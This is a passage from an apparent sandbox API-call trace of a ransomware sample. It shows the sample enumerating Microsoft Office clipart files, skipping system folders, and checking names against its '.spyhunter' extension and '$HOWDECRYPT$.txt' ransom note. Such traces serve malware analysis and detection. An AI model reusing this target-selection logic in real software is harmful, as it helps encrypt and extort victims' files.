(lpFirst="J0093905.WMF", lpSrch=".spyhunter") returned 0x0 [0097.931] lstrcmpW (lpString1="J0093905.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.931] lstrcmpW (lpString1="J0093905.WMF", lpString2="_uninstalling_.png") returned 1 [0097.931] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF") returned 67 [0097.931] GetProcessHeap () returned 0x2c0000 [0097.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38a878 [0097.931] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x20e8) returned 0x2c16890 [0097.931] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.931] lstrcmpiW (lpString1="J0098497.WMF", lpString2="Windows") returned -1 [0097.932] lstrlenW (lpString="Windows") returned 7 [0097.932] lstrcmpiW (lpString1="J0098497.WMF", lpString2="$Recycle.bin") returned 1 [0097.932] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.932] lstrcmpiW (lpString1="J0098497.WMF", lpString2="System Volume Information") returned -1 [0097.932] lstrlenW (lpString="System Volume Information") returned 25 [0097.932] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF") returned 67 [0097.932] StrStrIW (lpFirst="J0098497.WMF", lpSrch=".spyhunter") returned 0x0 [0097.932] lstrcmpW (lpString1="J0098497.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.932] lstrcmpW (lpString1="J0098497.WMF", lpString2="_uninstalling_.png") returned 1 [0097.932] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF") returned 67 [0097.932] GetProcessHeap () returned 0x2c0000 [0097.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38a948 [0097.932] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x20f0) returned 0x2c16890 [0097.932] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.932] lstrcmpiW (lpString1="J0099145.JPG", lpString2="Windows") returned -1 [0097.932] lstrlenW (lpString="Windows") returned 7 [0097.932] lstrcmpiW (lpString1="J0099145.JPG", lpString2="$Recycle.bin") returned 1 [0097.932] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.932] lstrcmpiW (lpString1="J0099145.JPG", lpString2="System Volume Information") returned -1 [0097.932] lstrlenW (lpString="System Volume Information") returned 25 [0097.932] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG") returned 67 [0097.932] StrStrIW (lpFirst="J0099145.JPG", lpSrch=".spyhunter") returned 0x0 [0097.933] lstrcmpW (lpString1="J0099145.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.933] lstrcmpW (lpString1="J0099145.JPG", lpString2="_uninstalling_.png") returned 1 [0097.933] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG") returned 67 [0097.933] GetProcessHeap () returned 0x2c0000 [0097.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38aa18 [0097.933] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x20f8) returned 0x2c16890 [0097.933] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.933] lstrcmpiW (lpString1="J0099146.WMF", lpString2="Windows") returned -1 [0097.933] lstrlenW (lpString="Windows") returned 7 [0097.933] lstrcmpiW (lpString1="J0099146.WMF", lpString2="$Recycle.bin") returned 1 [0097.933] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.933] lstrcmpiW (lpString1="J0099146.WMF", lpString2="System Volume Information") returned -1 [0097.933] lstrlenW (lpString="System Volume Information") returned 25 [0097.933] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF") returned 67 [0097.933] StrStrIW (lpFirst="J0099146.WMF", lpSrch=".spyhunter") returned 0x0 [0097.933] lstrcmpW (lpString1="J0099146.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.933] lstrcmpW (lpString1="J0099146.WMF", lpString2="_uninstalling_.png") returned 1 [0097.933] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF") returned 67 [0097.933] GetProcessHeap () returned 0x2c0000 [0097.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38aae8 [0097.933] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2100) returned 0x2c16890 [0097.933] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.934] lstrcmpiW (lpString1="J0099147.JPG", lpString2="Windows") returned -1 [0097.934] lstrlenW (lpString="Windows") returned 7 [0097.934] lstrcmpiW (lpString1="J0099147.JPG", lpString2="$Recycle.bin") returned 1 [0097.934] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.934] lstrcmpiW (lpString1="J0099147.JPG", lpString2="System Volume Information") returned -1 [0097.934] lstrlenW (lpString="System Volume Information") returned 25 [0097.934] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG") returned 67 [0097.934] StrStrIW (lpFirst="J0099147.JPG", lpSrch=".spyhunter") returned 0x0 [0097.934] lstrcmpW (lpString1="J0099147.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.935] lstrcmpW (lpString1="J0099147.JPG", lpString2="_uninstalling_.png") returned 1 [0097.935] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG") returned 67 [0097.935] GetProcessHeap () returned 0x2c0000 [0097.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38abb8 [0097.935] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2108) returned 0x2c16890 [0097.935] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.935] lstrcmpiW (lpString1="J0099148.JPG", lpString2="Windows") returned -1 [0097.935] lstrlenW (lpString="Windows") returned 7 [0097.935] lstrcmpiW (lpString1="J0099148.JPG", lpString2="$Recycle.bin") returned 1 [0097.935] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.935] lstrcmpiW (lpString1="J0099148.JPG", lpString2="System Volume Information") returned -1 [0097.935] lstrlenW (lpString="System Volume Information") returned 25 [0097.935] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG") returned 67 [0097.935] StrStrIW (lpFirst="J0099148.JPG", lpSrch=".spyhunter") returned 0x0 [0097.935] lstrcmpW (lpString1="J0099148.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.935] lstrcmpW (lpString1="J0099148.JPG", lpString2="_uninstalling_.png") returned 1 [0097.935] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG") returned 67 [0097.935] GetProcessHeap () returned 0x2c0000 [0097.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38ac88 [0097.935] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2110) returned 0x2c16890 [0097.935] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.935] lstrcmpiW (lpString1="J0099149.WMF", lpString2="Windows") returned -1 [0097.936] lstrlenW (lpString="Windows") returned 7 [0097.936] lstrcmpiW (lpString1="J0099149.WMF", lpString2="$Recycle.bin") returned 1 [0097.936] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.936] lstrcmpiW (lpString1="J0099149.WMF", lpString2="System Volume Information") returned -1 [0097.936] lstrlenW (lpString="System Volume Information") returned 25 [0097.936] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF") returned 67 [0097.936] StrStrIW (lpFirst="J0099149.WMF", lpSrch=".spyhunter") returned 0x0 [0097.936] lstrcmpW (lpString1="J0099149.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.936] lstrcmpW (lpString1="J0099149.WMF", lpString2="_uninstalling_.png") returned 1 [0097.936] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF") returned 67 [0097.936] GetProcessHeap () returned 0x2c0000 [0097.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38ad58 [0097.936] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2118) returned 0x2c16890 [0097.936] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.076] lstrcmpiW (lpString1="J0099150.JPG", lpString2="Windows") returned -1 [0098.076] lstrlenW (lpString="Windows") returned 7 [0098.076] lstrcmpiW (lpString1="J0099150.JPG", lpString2="$Recycle.bin") returned 1 [0098.076] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.076] lstrcmpiW (lpString1="J0099150.JPG", lpString2="System Volume Information") returned -1 [0098.076] lstrlenW (lpString="System Volume Information") returned 25 [0098.076] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG") returned 67 [0098.076] StrStrIW (lpFirst="J0099150.JPG", lpSrch=".spyhunter") returned 0x0 [0098.076] lstrcmpW (lpString1="J0099150.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.076] lstrcmpW (lpString1="J0099150.JPG", lpString2="_uninstalling_.png") returned 1 [0098.076] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG") returned 67 [0098.076] GetProcessHeap () returned 0x2c0000 [0098.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c1af00 [0098.076] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2118) returned 0x2c16890 [0098.077] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.077] lstrcmpiW (lpString1="J0099151.WMF", lpString2="Windows") returned -1 [0098.077] lstrlenW (lpString="Windows") returned 7 [0098.077] lstrcmpiW (lpString1="J0099151.WMF", lpString2="$Recycle.bin") returned 1 [0098.077] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.077] lstrcmpiW (lpString1="J0099151.WMF", lpString2="System Volume Information") returned -1 [0098.077] lstrlenW (lpString="System Volume Information") returned 25 [0098.077] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF") returned 67 [0098.077] StrStrIW (lpFirst="J0099151.WMF", lpSrch=".spyhunter") returned 0x0 [0098.077] lstrcmpW (lpString1="J0099151.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.077] lstrcmpW (lpString1="J0099151.WMF", lpString2="_uninstalling_.png") returned 1 [0098.077] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF") returned 67 [0098.077] GetProcessHeap () returned 0x2c0000 [0098.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38ae28 [0098.077] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2120) returned 0x2c16890 [0098.077] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.077] lstrcmpiW (lpString1="J0099152.JPG", lpString2="Windows") returned -1 [0098.077] lstrlenW (lpString="Windows") returned 7 [0098.077] lstrcmpiW (lpString1="J0099152.JPG", lpString2="$Recycle.bin") returned 1 [0098.077] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.077] lstrcmpiW (lpString1="J0099152.JPG", lpString2="System Volume Information") returned -1 [0098.078] lstrlenW (lpString="System Volume Information") returned 25 [0098.078] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG") returned 67 [0098.078] StrStrIW (lpFirst="J0099152.JPG", lpSrch=".spyhunter") returned 0x0 [0098.078] lstrcmpW (lpString1="J0099152.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.078] lstrcmpW (lpString1="J0099152.JPG", lpString2="_uninstalling_.png") returned 1 [0098.078] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG") returned 67 [0098.078] GetProcessHeap () returned 0x2c0000 [0098.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38aef8 [0098.078] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2128) returned 0x2c16890 [0098.078] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.078] lstrcmpiW (lpString1="J0099153.WMF", lpString2="Windows") returned -1 [0098.078] lstrlenW (lpString="Windows") returned 7 [0098.078] lstrcmpiW (lpString1="J0099153.WMF", lpString2="$Recycle.bin") returned 1 [0098.078] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.078] lstrcmpiW (lpString1="J0099153.WMF", lpString2="System Volume Information") returned -1 [0098.078] lstrlenW (lpString="System Volume Information") returned 25 [0098.078] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF") returned 67 [0098.078] StrStrIW (lpFirst="J0099153.WMF", lpSrch=".spyhunter") returned 0x0 [0098.078] lstrcmpW (lpString1="J0099153.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.078] lstrcmpW (lpString1="J0099153.WMF", lpString2="_uninstalling_.png") returned 1 [0098.078] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF") returned 67 [0098.078] GetProcessHeap () returned 0x2c0000 [0098.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38afc8 [0098.079] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2130) returned 0x2c16890 [0098.079] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.079] lstrcmpiW (lpString1="J0099154.JPG", lpString2="Windows") returned -1 [0098.079] lstrlenW (lpString="Windows") returned 7 [0098.079] lstrcmpiW (lpString1="J0099154.JPG", lpString2="$Recycle.bin") returned 1 [0098.079] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.079] lstrcmpiW (lpString1="J0099154.JPG", lpString2="System Volume Information") returned -1 [0098.079] lstrlenW (lpString="System Volume Information") returned 25 [0098.079] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG") returned 67 [0098.079] StrStrIW (lpFirst="J0099154.JPG", lpSrch=".spyhunter") returned 0x0 [0098.079] lstrcmpW (lpString1="J0099154.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.079] lstrcmpW (lpString1="J0099154.JPG", lpString2="_uninstalling_.png") returned 1 [0098.079] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG") returned 67 [0098.079] GetProcessHeap () returned 0x2c0000 [0098.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38b098 [0098.079] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2138) returned 0x2c16890 [0098.079] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.079] lstrcmpiW (lpString1="J0099155.JPG", lpString2="Windows") returned -1 [0098.079] lstrlenW (lpString="Windows") returned 7 [0098.079] lstrcmpiW (lpString1="J0099155.JPG", lpString2="$Recycle.bin") returned 1 [0098.079] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.080] lstrcmpiW (lpString1="J0099155.JPG", lpString2="System Volume Information") returned -1 [0098.080] lstrlenW (lpString="System Volume Information") returned 25 [0098.080] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG") returned 67 [0098.080] StrStrIW (lpFirst="J0099155.JPG", lpSrch=".spyhunter") returned 0x0 [0098.080] lstrcmpW (lpString1="J0099155.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.080] lstrcmpW (lpString1="J0099155.JPG", lpString2="_uninstalling_.png") returned 1 [0098.080] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG") returned 67 [0098.080] GetProcessHeap () returned 0x2c0000 [0098.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38b168 [0098.080] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2140) returned 0x2c16890 [0098.080] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.080] lstrcmpiW (lpString1="J0099156.JPG", lpString2="Windows") returned -1 [0098.080] lstrlenW (lpString="Windows") returned 7 [0098.080] lstrcmpiW (lpString1="J0099156.JPG", lpString2="$Recycle.bin") returned 1 [0098.080] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.080] lstrcmpiW (lpString1="J0099156.JPG", lpString2="System Volume Information") returned -1 [0098.080] lstrlenW (lpString="System Volume Information") returned 25 [0098.080] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG") returned 67 [0098.080] StrStrIW (lpFirst="J0099156.JPG", lpSrch=".spyhunter") returned 0x0 [0098.080] lstrcmpW (lpString1="J0099156.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.080] lstrcmpW (lpString1="J0099156.JPG", lpString2="_uninstalling_.png") returned 1 [0098.080] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG") returned 67 [0098.081] GetProcessHeap () returned 0x2c0000 [0098.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38b238 [0098.081] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2148) returned 0x2c16890 [0098.081] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.081] lstrcmpiW (lpString1="J0099157.JPG", lpString2="Windows") returned -1 [0098.081] lstrlenW (lpString="Windows") returned 7 [0098.081] lstrcmpiW (lpString1="J0099157.JPG", lpString2="$Recycle.bin") returned 1 [0098.081] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.081] lstrcmpiW (lpString1="J0099157.JPG", lpString2="System Volume Information") returned -1 [0098.081] lstrlenW (lpString="System Volume Information") returned 25 [0098.081] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG") returned 67 [0098.081] StrStrIW (lpFirst="J0099157.JPG", lpSrch=".spyhunter") returned 0x0 [0098.081] lstrcmpW (lpString1="J0099157.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.081] lstrcmpW (lpString1="J0099157.JPG", lpString2="_uninstalling_.png") returned 1 [0098.081] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG") returned 67 [0098.081] GetProcessHeap () returned 0x2c0000 [0098.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38b308 [0098.081] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2150) returned 0x2c16890 [0098.081] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.081] lstrcmpiW (lpString1="J0099158.WMF", lpString2="Windows") returned -1 [0098.081] lstrlenW (lpString="Windows") returned 7 [0098.081] lstrcmpiW (lpString1="J0099158.WMF", lpString2="$Recycle.bin") returned 1 [0098.082] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.082] lstrcmpiW (lpString1="J0099158.WMF", lpString2="System Volume Information") returned -1 [0098.082] lstrlenW (lpString="System Volume Information") returned 25 [0098.082] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF") returned 67 [0098.082] StrStrIW (lpFirst="J0099158.WMF", lpSrch=".spyhunter") returned 0x0 [0098.082] lstrcmpW (lpString1="J0099158.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.082] lstrcmpW (lpString1="J0099158.WMF", lpString2="_uninstalling_.png") returned 1 [0098.082] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF") returned 67 [0098.082] GetProcessHeap () returned 0x2c0000 [0098.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38b3d8 [0098.082] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2158) returned 0x2c16890 [0098.082] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.082] lstrcmpiW (lpString1="J0099159.WMF", lpString2="Windows") returned -1 [0098.082] lstrlenW (lpString="Windows") returned 7 [0098.082] lstrcmpiW (lpString1="J0099159.WMF", lpString2="$Recycle.bin") returned 1 [0098.082] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.082] lstrcmpiW (lpString1="J0099159.WMF", lpString2="System Volume Information") returned -1 [0098.082] lstrlenW (lpString="System Volume Information") returned 25 [0098.082] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF") returned 67 [0098.082] StrStrIW (lpFirst="J0099159.WMF", lpSrch=".spyhunter") returned 0x0 [0098.082] lstrcmpW (lpString1="J0099159.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.082] lstrcmpW (lpString1="J0099159.WMF", lpString2="_uninstalling_.png") returned 1 [0098.083] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF") returned 67 [0098.083] GetProcessHeap () returned 0x2c0000 [0098.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38b4a8 [0098.083] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2160) returned 0x2c16890 [0098.083] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.083] lstrcmpiW (lpString1="J0099160.JPG", lpString2="Windows") returned -1 [0098.083] lstrlenW (lpString="Windows") returned 7 [0098.083] lstrcmpiW (lpString1="J0099160.JPG", lpString2="$Recycle.bin") returned 1 [0098.083] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.083] lstrcmpiW (lpString1="J0099160.JPG", lpString2="System Volume Information") returned -1 [0098.083] lstrlenW (lpString="System Volume Information") returned 25 [0098.083] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG") returned 67 [0098.083] StrStrIW (lpFirst="J0099160.JPG", lpSrch=".spyhunter") returned 0x0 [0098.083] lstrcmpW (lpString1="J0099160.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.083] lstrcmpW (lpString1="J0099160.JPG", lpString2="_uninstalling_.png") returned 1 [0098.083] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG") returned 67 [0098.083] GetProcessHeap () returned 0x2c0000 [0098.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38b578 [0098.083] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2168) returned 0x2c16890 [0098.083] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.083] lstrcmpiW (lpString1="J0099161.JPG", lpString2="Windows") returned -1 [0098.084] lstrlenW (lpString="Windows") returned 7 [0098.084] lstrcmpiW (lpString1="J0099161.JPG", lpString2="$Recycle.bin") returned 1 [0098.084] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.084] lstrcmpiW (lpString1="J0099161.JPG", lpString2="System Volume Information") returned -1 [0098.084] lstrlenW (lpString="System Volume Information") returned 25 [0098.084] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG") returned 67 [0098.084] StrStrIW (lpFirst="J0099161.JPG", lpSrch=".spyhunter") returned 0x0 [0098.084] lstrcmpW (lpString1="J0099161.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.084] lstrcmpW (lpString1="J0099161.JPG", lpString2="_uninstalling_.png") returned 1 [0098.084] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG") returned 67 [0098.084] GetProcessHeap () returned 0x2c0000 [0098.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38b648 [0098.084] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2170) returned 0x2c16890 [0098.084] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.084] lstrcmpiW (lpString1="J0099162.JPG", lpString2="Windows") returned -1 [0098.084] lstrlenW (lpString="Windows") returned 7 [0098.084] lstrcmpiW (lpString1="J0099162.JPG", lpString2="$Recycle.bin") returned 1 [0098.084] lstrlenW (lpString="$Recycle.bin") returned 12 [0098.084] lstrcmpiW (lpString1="J0099162.JPG", lpString2="System Volume Information") returned -1 [0098.084] lstrlenW (lpString="System Volume Information") returned 25 [0098.084] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG") returned 67 [0098.085] StrStrIW (lpFirst="J0099162.JPG", lpSrch=".spyhunter") returned 0x0 [0098.085] lstrcmpW (lpString1="J0099162.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.085] lstrcmpW (lpString1="J0099162.JPG", lpString2="_uninstalling_.png") returned 1 [0098.085] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG") returned 67 [0098.085] GetProcessHeap () returned 0x2c0000 [0098.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x38b718 [0098.085] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c16890, Size=0x2178) returned 